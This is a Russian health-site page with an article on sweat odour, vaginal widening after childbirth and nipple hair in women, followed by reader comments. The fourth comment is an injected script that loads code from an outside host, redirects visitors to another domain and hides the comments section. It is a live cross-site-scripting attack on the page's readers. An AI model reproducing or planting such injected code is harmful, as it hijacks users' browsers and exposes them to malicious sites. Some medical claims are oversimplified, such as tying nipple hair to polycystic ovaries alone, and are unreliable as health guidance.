Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Интимные вопросы, научные...  >>  Интимные вопросы, научные ответы
 
Обратная связь
 

Интимные вопросы, научные ответы

Размер шрифта
23 марта 2012 10:00
  • google_analytics: false
  • Нравится

Почему пахнет пот? Чем отличается рожавшая женщина от нерожавшей? Волосы на сосках: опасно ли это? 

1 

  1. Дурной запах пота

Запах пота – это продукты жизнедеятельности микроорганизмов. Сам по себе пот не имеет ни цвета, ни запаха. Запах появляется от жизнедеятельности грибков и бактерий. На открытых частях тела пот быстро испаряется, и бактерии не успевают размножаться. Но закрытые участки тела, например, подмышки, – благоприятная среда для жизнедеятельности микроорганизмов. Именно они – источник дурного запаха. Кстати, повышенным потоотделением страдают люди с лишним весом.

Что делать

Если регулярно, не реже 2 раз в день, принимать душ и смывать остатки пота с кожи, бактерии не будут успевать размножаться. Даже потея, человек перестает быть источником запаха пота.

  1. Широкое влагалище после родов

Природа так устроила, что при родах у женщины существенно расширяются родовые пути. Плод не может покинуть матку, не оттеснив органы малого таза, не раздвинув тазовые мышцы и кости. Вот почему влагалище нерожавшей и влагалище многократно рожавшей женщины сильно отличаются. Когда женщины рожают первый раз, мышцы таза быстро восстанавливаются. После повторных родов мышцы растягиваются и в исходное состояние больше не возвращаются. 

Что делать

Гинеколог Кегель в 1960-х годах прошлого века предложил ряд упражнений для рожавших женщин, чтобы укрепить мышцы тазового дна и предупредить выпадение матки, влагалища или прямой кишки. Суть упражнений Кегеля очень проста – это имитация задержки акта мочеиспускания. Это упражнение можно делать как в туалете, так и вне его. Если делать это упражнение постоянно, растянутые мышцы можно восстановить. 

  1. Волосы на сосках

Волосы на сосках у женщин свидетельствуют о большом количестве андрогенов (мужских половых гормонов). Причина повышенного уровня этих гормонов – поликистоз яичников. При поликистозе яичники состоят из кист и не способны производить эстрогены. Малейшего спада в эстрогенах достаточно, чтобы андрогены начали преобладать. 

Действие мужских половых гормонов проявляется, в частности, и в появлении волос в нехарактерных для женщин местах (на лице, на груди).

Что делать

  • Обследоваться и проверить функцию яичников и всех эндокринных органов. Врач может назначить противозачаточные таблетки в качестве лечения. Антиандрогены в этих препаратах блокируют действие андрогенов и ликвидируют рост волос по мужскому типу.
  • Если при обследовании обнаружена гормонопродуцирующая опухоль, потребуется хирургическое вмешательство. 

 


Cюжеты по теме:
Вопрос на все времена. Нормальный ли я?


 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

23 марта 2012 в 12:24

Цитировать   |   Пожаловаться

Ну, наверное, не прям на сосках волосы! Даже у мужчин они не на сосках, а возле ореолы! А как быть с тем, что волосы эти есть и были всегда, но беременность наступает чуть ли не от поцелуя (образно выражаясь), уже 6 беременностей было!

2 - Гость

23 марта 2012 в 23:19

Цитировать   |   Пожаловаться

Гость 23 марта 2012 в 12:24
беременность наступает чуть ли не от поцелуя (образно выражаясь), уже 6 беременностей было!
 Девушка, вы говорите страшные вещи!!! 6 беременностей, как я понимаю, закончились печально. Неужели нельзя предохраняться? 

3 - Гость

26 марта 2012 в 11:10

Цитировать   |   Пожаловаться

Ну почему, первая беременность -есть ребенок, а остальные - нечем было в советское время предохраняться, в аптеках ничего не продавали. Вот и получились ляпы с подсчетом дней.

4 - zzzzzz

30 июня 2015 в 23:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.